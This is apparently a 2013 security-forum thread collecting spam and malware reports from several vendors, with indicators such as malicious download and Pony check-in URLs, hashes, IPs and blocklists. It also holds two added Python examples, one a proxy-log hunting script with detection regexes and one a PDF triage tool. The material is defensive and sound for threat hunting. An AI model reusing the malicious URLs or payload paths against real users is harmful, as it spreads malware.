ammsdallas .com/ponyb/gate.php
ammsdirectors .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Case_<random>.zip (0ed9dd827d557d3e20818ab50c7d930b)
Case_<random>.exe (f317d215a672a209cbdcba452e5e84d8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/864f030c0de853f3b6a5ca065a105f5e/tumblr_inline_mp24td7SVn1qz4rgp.png
__
Fake OfficeWorld .com SPAM / sartorilaw .net
- http://blog.dynamoo.com/2013/06/officeworldcom-spam-sartorilawnet.html
27 June 2013 - "This fake OfficeWorld spam leads to malware on sartorilaw .net:
Date: Thu, 27 Jun 2013 12:39:36 -0430 [13:09:36 EDT]
From: customerservice @emalsrv.officeworldmail .net
Subject: Confirmation notification for order 1265953
Thank you for choosing OfficeWorld.com - the world's biggest selection of business products!
Please review your order details below. If you have any questions, please Contact Us
Helpful Tips:
- Please SAVE or PRINT this confirmation for your records.
- ORDER STATUS is available online! Login and click "My Orders" to obtain UPS tracking information, etc.
- If you skipped registration, or forgot your password, simply enter your Login ID (normally your full e-mail address) and click [ forgot password ] to access your account.
Order: 1265953
Date: 6/27/2013
Ship To: My Default
Credit Card: MasterCard
Product Qty Price Unit Extended
HEWCC392A 1 $9703.09 EA $15.15
AVE5366 1 $27.49 BX $27.49
SAF3081 2 $56.29 EA $112.58
Product Total: $9855.22
Total: $9855.22
OfficeWorld.com values your business!
The link in the email goes through a legitimate -hacked- site and then on to [donotclick]sartorilaw .net/news/source_fishs.php (report here*) hosted on the following IPs:
77.240.118.69 (Acens Technologies, Spain)
78.108.86.169 (Majordomo LLC, Russia)
89.248.161.148 (Ecatel, Netherlands)
108.177.140.2 (Nobis Technology Group, US)
Recommended blocklist:
77.240.118.69
78.108.86.169
89.248.161.148
108.177.140.2 ..."
* http://urlquery.net/report.php?id=3362472
"... Detected BlackHole v2.0 exploit kit URL pattern ..."
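Across the dynamoo and ThreatTrack write-ups above the same URL shapes keep recurring: the Blackhole v2 landing page at /news/<word>-<word>.php or /news/<word>_<word>.php, the Pony loader check-in at /ponyb/gate.php, the parcel-spam /main.php?..=ss00_323 pages, and downloads of a short random-named .exe from a document root. The Websense post on the same sartorilaw .net domain (28 June, further down this thread) also shows the kit's payload-fetch form, whose first query value is a run of colon-separated short tokens. The script below, an added example and not code from dynamoo, ThreatTrack or Websense, turns those shapes into hunting rules run over proxy-log lines and checks the destination IP against the blocklists recommended in the posts above. The regexes are generalised from the handful of URLs quoted here, so treat them as hunting heuristics rather than signatures; the log lines are constructed (fields: time, client, method, url, dest_ip) from indicators on this page plus example.com traffic for the negative cases.

```python
"""URL-shape hunting rules for the Blackhole v2 / Pony spam runs quoted above,
run over constructed proxy-log lines.  Added example, not code from dynamoo,
ThreatTrack or Websense."""
import ipaddress
import re
from urllib.parse import urlsplit

# (rule name, regex over path + "?" + query).  Assumption: generalised from the
# few URLs quoted on this page, so these are hunting heuristics, not signatures.
RULES = [
    # Blackhole v2 landing: /news/<word>-<word>.php or /news/<word>_<word>.php
    ("bhek2_landing", re.compile(r"^/news/[a-z]+(?:[-_][a-z]+){1,3}\.php(?:\?|$)")),
    # kit payload fetch: first query value is colon-separated one/two-char tokens
    ("bhek2_payload", re.compile(r"\.php\?[a-z]+=[0-9a-z]{1,2}(?::[0-9a-z]{1,2}){2,}&[a-z]+=")),
    # Pony loader check-in
    ("pony_checkin", re.compile(r"/pony[a-z]?/gate\.php$")),
    # FedEx/UPS/DHL parcel spam: /main.php?inf=ss00_323, ?g_info=..., ?d_info=...
    ("parcel_spam_main_php", re.compile(r"/main\.php\?(?:inf|[a-z]_info)=")),
    # short random-named executable at the document root; low confidence on its own
    ("random_name_exe", re.compile(r"^/[A-Za-z0-9]{3,8}\.exe$")),
]

# IPs taken from the "Recommended blocklist" sections of the posts above
BLOCKLIST = frozenset(ipaddress.ip_address(a) for a in (
    "193.254.231.51", "202.147.169.211", "119.147.137.31", "203.80.17.155",
    "210.42.103.141", "77.240.118.69", "78.108.86.169", "89.248.161.148",
    "108.177.140.2", "208.81.165.252",
))


def classify_url(url: str) -> list:
    """Names of every rule the URL's path+query matches, in RULES order."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    return [name for name, rx in RULES if rx.search(target)]


def scan_log(lines, blocklist=BLOCKLIST) -> list:
    """One hit per line that matches a rule or talks to a blocklisted IP."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line; a real pipeline would count and report these
        _ts, client, _method, url, dest = fields
        rules = classify_url(url)
        try:
            blocked = ipaddress.ip_address(dest) in blocklist
        except ValueError:
            blocked = False  # destination field is not an IP literal
        if rules or blocked:
            hits.append({"client": client, "url": url, "dest": dest,
                         "rules": rules, "blocked_ip": blocked})
    return hits


# Constructed log lines (time client method url dest_ip).  The domains and the
# first destination IP are indicators quoted on this page; the rest is filler.
SAMPLE_LOG = [
    "1372420800 10.0.0.5 GET http://sartorilaw.net/news/source_fishs.php?kxdtlz=1l:1g:1i:1o:1j&mbtdi=1k:33:1f:32:2w:30:1h:1o:1h:1g&swlpwu=1i&doko=vaif&wgnrppva=xoti 77.240.118.69",
    "1372420801 10.0.0.5 GET http://casailtiglio.com/NY19N.exe 198.51.100.20",
    "1372420802 10.0.0.5 POST http://ammscanada.com/ponyb/gate.php 198.51.100.21",
    "1372420803 10.0.0.9 GET http://ah-nanas.se/main.php?inf=ss00_323 198.51.100.22",
    "1372420804 10.0.0.9 GET http://www.example.com/news/index.php 93.184.216.34",
    "1372420805 10.0.0.9 GET http://www.example.com/downloads/setup.exe 93.184.216.34",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["dest"], ",".join(hit["rules"]) or "-",
              "BLOCKLISTED" if hit["blocked_ip"] else "", hit["url"])
```

The two example.com lines are there to show the rules' edges: /news/index.php has no hyphen or underscore segment and so is not a landing-page hit, and an .exe below a subdirectory is not matched by the root-only random-name rule. Client 10.0.0.5 in the sample shows the full sequence a Blackhole victim produces: landing page, payload fetch, then the loader's check-in.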
AplusWebMaster
2013-06-28, 16:33
FYI...
Fake Fox News-themed malicious email campaign
- http://community.websense.com/blogs/securitylabs/archive/2013/06/28/fox-news-themed-malicious-email-campaign.aspx
28 Jun 2013 - "Websense... discovered an interesting malicious email campaign using spoofed email addresses from Fox News domains in an attempt to ultimately lure victims to websites hosting the Blackhole Exploit Kit. Should the exploit and compromise be successful, a malicious payload related to the Cridex family appears to be delivered which, as detailed in an earlier Websense Security Labs blog, is typically used to steal banking credentials as well as the exfiltration of personally identifiable information (PII) and other confidential data for criminal gain. These emails, discovered early on the morning of June 27th, featured “breaking news” subjects and mimicked legitimate news content related to the US Military moving into Syria in order to entice the victim to 'click' on the malicious links. The campaign appears to have targeted a variety of industries and countries, as of 1600 PST on June 27th, the Websense ThreatSeeker® Intelligence Cloud had detected and blocked over 60,000 samples.
... Screenshot:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/8360.1.png_2D00_550x0.png
Intercepted emails generated interest as they are highly convincing as breaking news alerts and are targeting highly popular and polarizing topics such as Immigration reform, the war on terror, and sending troops to Syria. Example email subjects include:
- U.S. Military Action in Syria - is it WW3 start?
- US deploys 19,000 troops in Syria
- Obama Sending US Forces to Syria
Malicious Email Analysis: The emails above contain links that follow a series of redirections leading to a BlackHole exploit kit which delivers a malicious PDF. Once opened, the malicious PDF executes embedded and obfuscated JavaScript code which delivers an exploit (CVE-2010-0188). In the event the exploit is successful, the shellcode downloads a malicious component from: hxxp ://sartorilaw .net/news/source_fishs.php?kxdtlz=1l:1g:1i:1o:1j&mbtdi=1k:33:1f:32:2w:30:1h:1o:1h:1g&swlpwu=1i&doko=vaif&wgnrppva=xoti
The malicious component downloaded by the shell-code is characterized as a Trojan that is capable of downloading malicious files onto a compromised computer and spreading itself via mapped and removable drives.
Malicious component:
https://www.virustotal.com/en/file/2b6a58cbf235fedfbcdb1f15645f5d3f9156ebeb916074539b83c1e7934b1ef9/analysis/
About the PDF file:
https://www.virustotal.com/en/file/f2130f5c0e388454db7c8b25d16b59cb19ba193fe6cd1a5a7b7168d94e6d243b/analysis/
... Once executed, a number of HTTP connections on port 8080 are opened in order to download additional malicious payloads..."
(More detail available at the websense URL above.)
___
Fake jConnect SPAM / FAX_281_3927981981_283.zip
- http://blog.dynamoo.com/2013/06/jconnect-spam-fax2813927981981283zip.html
28 June 2013 - "This fake fax spam is meant to contain malware, but in this particular case is being sent out with a corrupt attachment:
Date: Fri, 28 Jun 2013 09:41:52 -0500 [10:41:52 EDT]
From: jConnect [message @inbound .j2 .com]
Subject: jConnect fax from "697-377-6967" - 28 page(s), Caller-ID: 697-377-6967
Fax Message[Caller-ID: 697-377-6967] You have received a 28 page(s) fax at 2012-12-17
02:13:41 EST.* The reference number for this fax is
lax3_did10-1019412300-0003832668-11.This message can be opened using your PDF reader. If
you have not already installed j2 Messenger, download it for
free:http ://www.j2 .com/downloadsPlease visit http ://www.j2 .com/help if you have any
questions regarding this message or your j2 service.Thank you for using jConnect!Home
Contact Login2011 j2 Global Communications, Inc. All rights reserved.jConnect is a
registered trademark of j2 Global Communications, Inc.This account is subject to the
terms listed in thejConnect Customer Agreement.
Both the email and the attachment are horribly mangled, and in this case don't contain their malicious payload (as with this spam run*). But be careful if receiving an email of this type as the next time the spammers try it, it may well be more dangerous."
* http://blog.dynamoo.com/2013/06/lexisnexis-spam-fail.html
___
- http://threattrack.tumblr.com/post/54102642094/jconnect-fax-spam
June 28, 2013 - "Subjects Seen:
jConnect fax from "[removed]" - 26 page(s), Caller-ID: [removed]
Typical e-mail details:
You have received a 26 page(s) fax at 2012-12-17 05:25:42 EST.
* The reference number for this fax is [removed].
This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2 .com/downloads
Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
Thank you for using jConnect!
Malicious URLs
ammsseattle .com/ponyb/gate.php
ammsstlouis .com/ponyb/gate.php
ammstestimonials .com/ponyb/gate.php
common.karsak .com .tr/FzPfH6.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
printex-gmbh .de/kbo.exe
sraclinic.netarama .com/2aeDdDTW.exe
Malicious File Name and MD5:
Fax_<random>.zip (05c33cfcf22c5736c4a162f6d7c2eeac)
Fax_<random>.exe (f9a80dbb13546e235617f5b21d64cad8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ddcd54466f73c81dcfb90ab3830659ac/tumblr_inline_mp3zr5rL5Z1qz4rgp.png
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Faxed Document Delivery Email Message - 2013 Jun 28
Fake Product Availability Request Email Messages - 2013 Jun 28
Fake Banking News Report Email Messages - 2013 Jun 28
Fake Purchase Order Invoice Email Messages - 2013 Jun 28
Fake Photo Sharing Email Messages - 2013 Jun 28
Fake Bank Deposit Confirmation Notice Email Messages - 2013 Jun 28
Fake Portuguese Photo Sharing link Email Messages - 2013 Jun 28
Fake Confidential Business Request Email Messages - 2013 Jun 28
Fake Product Purchase Order Request Email Messages - 2013 Jun 28
Fake Scanned Document Attachment Email Messages - 2013 Jun 28
Fake CashPro Online Digital Certificate Notification Email Messages - 2013 Jun 28
(More detail and links at the cisco URL above.)
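Websense's chain above ends in a PDF whose embedded, obfuscated JavaScript fires the CVE-2010-0188 exploit. The static tells of such a document are well known and cheap to check before anything is opened: a JavaScript action, an /OpenAction or /AA that runs it automatically, PDF names written with hex escapes (/J#61vaScript is /JavaScript to a reader but not to a naive grep), and keywords hidden inside FlateDecode streams. The triage below is an added example in the style of pdfid, not Websense's or the kit's code; it inflates the streams it can, resolves name escapes, counts the keywords and scores the result. The sample PDF it builds is constructed for the test and carries a harmless placeholder script, not the exploit.

```python
"""pdfid-style static triage for the JavaScript-bearing exploit PDFs the
Blackhole kit delivers.  Added example, not Websense's or the kit's code; the
sample document is constructed and contains a placeholder script only."""
import re
import zlib

KEYWORDS = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
            "/EmbeddedFile", "/XObject", "/Image"]
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\nendstream", re.DOTALL)
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def inflate_streams(data: bytes) -> bytes:
    """Return data plus the inflated content of every stream zlib can decode,
    so keywords hidden inside compressed objects are counted too."""
    out = [data]
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates trailing bytes (e.g. a CR) after the stream end
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not FlateDecode, or damaged; nothing to add
    return b"\n".join(out)


def unescape_names(data: bytes) -> bytes:
    """Resolve #xx escapes in PDF names (/J#61vaScript -> /JavaScript)."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count keywords after inflating streams and resolving escapes, then score."""
    expanded = unescape_names(inflate_streams(data))
    counts = {k: len(re.findall(re.escape(k.encode()) + rb"(?![A-Za-z])", expanded))
              for k in KEYWORDS}
    # escapes inside a name token on the raw bytes; heuristic, binary streams can fool it
    obfuscated = re.search(rb"/[A-Za-z]*#[0-9A-Fa-f]{2}", data) is not None
    has_js = counts["/JavaScript"] + counts["/JS"] > 0
    auto_exec = counts["/OpenAction"] + counts["/AA"] > 0
    if has_js and (auto_exec or obfuscated):
        verdict = "suspicious"
    elif has_js or counts["/Launch"] or counts["/EmbeddedFile"]:
        verdict = "review"
    else:
        verdict = "clean"
    return {"counts": counts, "obfuscated_names": obfuscated, "verdict": verdict}


def build_sample_pdf() -> bytes:
    """Constructed PDF: /OpenAction points at a hex-escaped /J#61vaScript action
    whose script sits in a FlateDecode stream.  The script is a harmless stub."""
    js = b"var s = 'placeholder'; app.alert(s);"
    body = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /J#61vaScript /J#53 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body) + body + b"\nendstream",
    ]
    out = [b"%PDF-1.4\n"]
    offsets = []
    for i, obj in enumerate(objs, 1):
        offsets.append(sum(len(x) for x in out))
        out.append(b"%d 0 obj\n" % i + obj + b"\nendobj\n")
    xref_pos = sum(len(x) for x in out)
    xref = b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    xref += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out.append(xref + b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
               % (len(objs) + 1, xref_pos))
    return b"".join(out)


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

For a real sample, read the file in binary mode and pass the bytes to triage_pdf. The obfuscated-names check runs over the raw bytes, so binary stream content can occasionally produce a false hit; that is why it only lifts the verdict when JavaScript is present as well, and why the result is a triage score to prioritise sandboxing, not a detection on its own.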
AplusWebMaster
2013-06-30, 00:21
FYI...
Instagram "Fruit" SPAM
- https://isc.sans.edu/diary.html?storyid=16087
Last Updated: 2013-06-29 20:28:25 UTC - "Currently, Instagram appears to be -flooded- with images of various fruits, pointing to a site that advertises a "miracle fruit diet". The spam attack links to a fake BBC page, typically via a bit.ly link. The "BBC" page features an article touting the power of the advertised diet scheme. It appears that compromised Instagram accounts are the source of the spam. The accounts were compromised using -phishing- e-mails as some reports indicate. In addition to posting the images, the users profile URL is also changed to the spam website."
AplusWebMaster
2013-07-01, 14:52
FYI...
Adware sites to block - 1 July 2013
- http://blog.dynamoo.com/2013/07/adware-sites-to-block-1713.html
1 July 2013 - "Never trust any sort of ad network that uses anonymous domains and hides all other identifying data. These seem to be doing the rounds at the moment, some of them may be involved in injection attacks or adware installs...
cdnsrv .com
tracksrv .com
cdnloader .com
secure-content-delivery .com
mydatasrv .com
Domains all seem to be on parking IPs or Amazon AWS, so difficult to block by IP address."
___
Email credentials - Phish
- http://threattrack.tumblr.com/post/54341109175/email-credentials-phish
July 1, 2013 - "Subjects Seen:
Email Deactivation Notice
Typical e-mail details:
An automatic security update has been carried out on your Email Account.
Click here to Login and complete update
Please note that you have within 24 hours to complete this update, because you might lose access to your Email Account
Malicious URLs
190.6.206.173 /~radioxge/updated/index.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d20e774e38626d820e2cb9c6c13f3fdf/tumblr_inline_mp9ex0Pz3B1qz4rgp.png
___
Fake Pinterest SPAM / pinterest .com.reports0701.net
- http://blog.dynamoo.com/2013/07/pinterest-spam-pinterestcomreports0701n.html
1 July 2013 - "This fake Pinterest spam leads to malware on pinterest .com.reports0701.net:
Date: Mon, 1 Jul 2013 21:04:36 +0530
From: "Pinterest" [naughtinessw5 @newsletters .pinterest .net]
To: [redacted]
Subject: Your password on Pinterest Successfully changed!
[redacted]
Yor password was reset. Request New Password.
See Password
Pinterest is a tool for collecting and organizing things you love.
This email was sent to [redacted].
Don't want activity notifications? Change your email preferences.
©2013 Pinterest, Inc. | All Rights Reserved
Privacy Policy | Terms and Conditions
The link goes through a legitimate -hacked- site to end up on a malicious payload at [donotclick]pinterest .com.reports0701.net/news/pay-notices.php (report here* and here**) which contains an exploit kit. The malware is hosted on a subdomain of a main domain with fake WHOIS details (it belongs to the Amerika gang) which is a slightly new technique:
June Parker parker @mail .com
740-456-7887 fax: 740-456-7844
4427 Irving Road
New Boston OH 45663
us
The following IPs are in use:
77.240.118.69 (Acens Technologies, Spain)
89.248.161.148 (Ecatel, Netherlands)
208.81.165.252 (Gamewave Hongkong Holdings, US)
Recommended blocklist:
77.240.118.69
89.248.161.148
208.81.165.252 ..."
* http://urlquery.net/report.php?id=3454469
** http://urlquery.net/report.php?id=3454450
AplusWebMaster
2013-07-02, 15:24
FYI...
Adware sites to block 2/7/13
- http://blog.dynamoo.com/2013/07/adware-sites-to-block-2713.html
2 July 2013 - "Never trust an ad network that uses anonymous WHOIS details. These are hosted on 108.161.189.161 (NetDNA, US) and all hide their details... Given the amount of adware* on this server, I would recommend blocking it... "
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/ip-address/108.161.189.161/information/
___
Malware sites to block 2/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-2713.html
2 July 2013 - "These sites belong to this gang* and house exploit kits and other nastiness. I've broken the list down into three sections: IPs and web hosts, plain IPs (for copy and pasting) and malware domains. The domains change on a regular basis, the IPs less frequently and are therefore probably the best things to block..."
(Long lists at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Babylon and the 3954 Trojans...
- http://blog.dynamoo.com/2013/07/babylon-and-3954-trojans-or-whore-of.html
2 July 2013 - ""Babylon and the 3954 Trojans" sounds like a swords and sandals epic, but unfortunately it's just another example of crapware gone wild... At the heart of Babylon.com's business is a marginally useful "free" translation application plus some paid add-ons... and installs a load of crapware onto your computer when it does so... system administrators keep finding the product installed on their machines, adware and all. This piece of software even has its own Wikipedia entry* covering malware issues. Do you really want your users to go anywhere near this site? As far as I can tell, at the moment the Babylon software is downloaded from the following IPs which you may want to -block- (all operated by Singlehop):
69.175.87.109
81.93.185.144
81.93.185.145
173.236.48.139
173.236.91.147
184.154.40.59
184.154.151.19
198.143.175.67
216.104.42.91 ..."
(More detail at the dynamoo URL above.)
* http://en.wikipedia.org/wiki/Babylon_%28software%29#Malware_issues
> https://www.virustotal.com/en/domain/babylon.com/information/
Diagnostic page for AS32475 (SINGLEHOP)
- https://www.google.com/safebrowsing/diagnostic?site=AS:32475
- https://www.google.com/safebrowsing/diagnostic?site=babylon.com
"... Malicious software includes 3954 trojan(s)..."
___
DHL Shipment Notification Spam
- http://threattrack.tumblr.com/post/54451871009/dhl-shipment-notification-spam
July 2, 2013 - "Subjects Seen:
Delivery Status Notification ID#[removed]
Typical e-mail details:
DHL Ship Shipment Notification
On June 23, 2013 a shipment label was printed for delivery.
The shipment number of this package is [removed].
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Malicious URLs
ah-nanas .se/main.php?inf=ss00_323
unitedcricketclub .co.za/main.php?inf=ss00_323
dsfstore .ro/main.php?inf=ss00_323
Malicious File Name and MD5:
Delivery_Information.zip (6ea731d13579040c20208dfbc7bddb0f)
Delivery_Information_ID-<random>.exe (560f37022593bf13c4071f4c5dc3b48c)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0085675aa612ec546f18835d5fe59d37/tumblr_inline_mpbrq1AKhv1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-07-03, 22:55
FYI...
Blackhole Exploit Kit SPAM campaign hits Pinterest
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-exploit-kit-spam-campaign-hits-pinterest/
July 3, 2013 - "... we are now seeing a BHEK spam campaign targeting social networking website -Pinterest- and its users. Prior to this campaign, the website has also been the target of other threats, such as survey scams and spammed mails that lead to malicious websites.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/pinterestbhek.jpg
We received a sample of the messages being spammed, and upon analysis, discovered how its infection chain goes. Here is the entire infection chain, as follows:
• The user receives the spammed mail in his inbox. It is tailored to resemble a legitimate mail from Pinterest, and notifies the user about a successful password change. It also presents a link that would allow him to see his new password.
• Should the user click on the link, he is put through a series of website redirects. This redirection is detected as HTML_IFRAME.USR.
• HTML_IFRAME.USR then downloads another malware onto the system, TROJ_PIDIEF.USR, which in turn drops BKDR_KRIDEX.KA. This final payload, being backdoor malware, has the ability to perform commands from a remote malicious user, and therefore can compromise a system’s security.
While there is nothing new in this routine, users are still advised to always perform account-related changes only on the websites they subscribe to. We also point towards the usage of CRIDEX as a final payload – a malware family that we’ve written about as one of the two families used in BHEK attacks. Like ZBOT, CRIDEX is used mainly to steal online banking information. To further protect themselves from these sorts of threats, users should ensure that all software in their systems is updated and patched (namely Java, Adobe Acrobat, Adobe Reader, and Flash). This is because BHEK operates by exploiting vulnerabilities in popular software, and keeping that software plus their browser of choice updated can help prevent them from becoming victims. Avoiding links presented in suspicious mails and verifying the mail’s content first by contacting the supposed sender through other means (phone call, visitation) can also go a long way..."
:fear: :mad:
AplusWebMaster
2013-07-05, 20:23
FYI...
Fake EBC Password Reset Confirmation SPAM / paynotice07 .net
- http://blog.dynamoo.com/2013/07/ebc-password-reset-confirmation-spam.html
5 July 2013 - "This fake password reset spam leads to malware on paynotice07 .net:
From: EBC_EBC1961Registration@ebank6 .secureaps .com
Sent: 05 July 2013 12:27
Subject: Password Reset Confirmation
Your Online Bankking password was successfully changed on 07/05/2013. If you did not make this change, or if you have any questions, please contact EBC Technical Support using this link.
Support is available Monday - Friday, 8 AM to 8 PM CST.
This is an automated message, please do not reply. Your message will not be received...
The link goes through a legitimate -hacked- site and ends up on a payload at [donotclick]paynotice07 .net/news/must-producing.php (report here*) hosted on the following IPs:
189.84.25.188 (DataCorpore Serviços e Representações, Brazil)
202.28.69.195 (Walailuk University, Thailand)
Blocklist: ..."
* http://urlquery.net/report.php?id=3554479
___
Invoice Export License Spam
- http://threattrack.tumblr.com/post/54688403070/invoice-export-license-spam
July 5, 2013 - "Subjects Seen:
invoice copy
Typical e-mail details:
Kindly open to see export License and payment invoice attached,
meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if
there is any problem.
Thanks
Karen parker
Malicious File Name and MD5:
invoice copy.zip (5e58effccB7dfbe81910fefaf17766d9)
invoice copy (2).exe (d70ab58ee9fffd968c3e7327adbb550e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/882a8e3833f315615be3221f5111ce20/tumblr_inline_mph7z9ValW1qz4rgp.png
:mad:
AplusWebMaster
2013-07-08, 19:38
FYI...
Fake AMEX SPAM - americanexpress .com.krasalco .com
- http://blog.dynamoo.com/2013/07/amex-spam-americanexpresscomkrasalcocom.html
8 July 2013 - "This fake Amex spam leads to malware on americanexpress .com.krasalco .com:
From: American Express [mailto:AmericanExpress @emalsrv.aexpmail .org]
Sent: 08 July 2013 15:00
Subject: Account Alert: A Payment Was Received
Check your account balance online at any time
Hello, [redacted]
View Account
Make a Payment
Manage Alerts Preferences
Payment Received
Check Balance
We received a payment for your Card account.
Date Received:
Mon, Jul 08, 2013
Payment Amount:
$2,511.92
Payments received after 8PM MST may not be credited until the next day. Please allow 24-48 hours for your payment to appear online.
Thank you for your Cardmembership.
American Express Customer Care
Was this e-mail helpful? Please click here to give us your feedback...
Screenshot: https://lh3.ggpht.com/-7XFKs5MUprk/UdrW3mejy1I/AAAAAAAABcg/0eXLit0ekC8/s400/amex.png
The link in the email goes through a legitimate -hacked- site to end up on a malicious landing page at [donotclick]americanexpress .com.krasalco .com/news/slightly_some_movie.php (report here*) hosted on the following IPs:
77.240.118.69 (Acens Technologies, Spain)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
151.155.25.111 (Novell Inc, US)
202.28.69.195 (Uninet, Thailand)
Blocklist: ..."
* http://urlquery.net/report.php?id=3606244
___
Fake Xerox WorkCentre Pro Spam
- http://threattrack.tumblr.com/post/54929354396/xerox-workcentre-pro-spam
July 8, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: [removed]
Number of Images: 6
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name: [removed]
Attached file is scanned image in PDF format.
Malicious URLs
2ndtimearoundweddingphotography .com/ponyb/gate.php
bobkahnvideo .com/ponyb/gate.php
gfpmenusonline .com/ponyb/gate.php
gfponlineordering .com/ponyb/gate.php
lacasadelmovilusado .com/bts1.exe
common.karsak .com.tr/FzPfH6.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
qualitydoorblog .com/qbSTq.exe
Malicious File Name and MD5:
SCAN_<random>.zip (da8f4d5dc27dd81c6e3eff217a6501ec)
SCAN_<random>.exe (59ee4453da8909e96762f2c8cd0d6f37)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/57a60624557c8734388e1cf5d49e11a2/tumblr_inline_mpmqr4FfuK1qz4rgp.png
___
Man of Steel, Fast and Furious 6 Among Online Fraudsters’ Most Used Lures
- http://blog.trendmicro.com/trendlabs-security-intelligence/man-of-steel-fast-and-furious-6-among-online-fraudsters-most-used-lures/
July 8, 2013 - "... Fraudsters are relentless in creating fake streaming sites, not just on the screening date of these movies, but also before the release of movies in theaters... attackers use various social media sites like Facebook, Google+, Youtube, LinkedIn, and many others to drive users to the fake streaming pages. These are hosted on blogging services like Tumblr, WordPress, and Blogger. Most pages on these blogs have shortened URLs that lead to the final sites... Because they used the services of URL shorteners, we were able to view the number of visits per selected movie. It appears that Man of Steel, Fast and the Furious 6 and Iron Man 3 got the highest number of viewers. This data is for a two-month period from late April up to the end of June.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/total-pageviews-chart.jpg
Total pageviews of fake streaming sites (per movie titles)
To lure in users, attackers use key phrases like “watch movie title online” or “download movie title free”. Using Blackhat Search Engine Optimization or BHSEO, users looking for the above pages are lured to visit the -fake- streaming sites. This is also known as one of the manipulations of search engine indexes in -spamdexing-. Many of the common keywords used are what you’d expect: “watch”, “online”, “free”, etcetera. One of the more surprising keywords is “putlocker”, which refers to a UK-based file locker. In terms of countries involved, while the United States accounts for more than two-thirds of the traffic to these sites, other countries were also represented. Users are advised to stream and subscribe to -legitimate- sites and -not- from these fake streaming sites. Be wary of sharing posts and clicking links that could propagate these scams. In addition, there might be no such thing as online streaming or movie download except for pirated copies, which in itself can be risky..."
___
sendgrid .me / amazonaws .com SPAM
- http://blog.dynamoo.com/2013/07/sendgridme-amazonawscom-spam.html
8 July 2013 - "This spam is unusual in that it comes through an apparently genuine commercial email provider (sendgrid .me) and leads to malware hosted on Amazon's cloud service, amazonaws .com. There is no body text in the spam, just an image designed to look like a downloadable document.
from: [victim] via sendgrid .me
date: 8 July 2013 19:08
subject: Urgent 6:08 PM 244999
Signed by: sendgrid .me
Screenshot: https://lh3.ggpht.com/-w5tfHokyzRw/UdseyJUaf0I/AAAAAAAABc0/DlZ0NKkn0bw/s1600/pic848755.jpg
The email appears to originate from 138.91.78.32 which is a Microsoft IP, so that part of the mail header might be faked. It certainly comes through 208.117.55.132 (o1.f.az.sendgrid .net).
The text at the bottom says "Please find attached the document." but actually leads to a malicious executable at [donotclick]s3.amazonaws .com/ft556/Document_948357853____.exe [https] (VirusTotal report*) which then downloads a further executable from [donotclick]s3.amazonaws .com/mik49/ss32.exe [http] (VirusTotal report**) which installs itself into C:\Documents and Settings\Administrator\Application Data\ss32.exe. ThreatExpert reports*** that the downloader (the first executable) is hardened against VM-based analysis:
Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine)... The second part (ss32.exe) attempts to lookup a server called mssql.maurosouza9899.kinghost .net 177.185.196.130 (IPV6 Internet Ltda, Brazil)... VirusTotal does report some other badness on 177.185.196.130 so this is probably worth blocking.
Recommended blocklist:
177.185.196.130 ..."
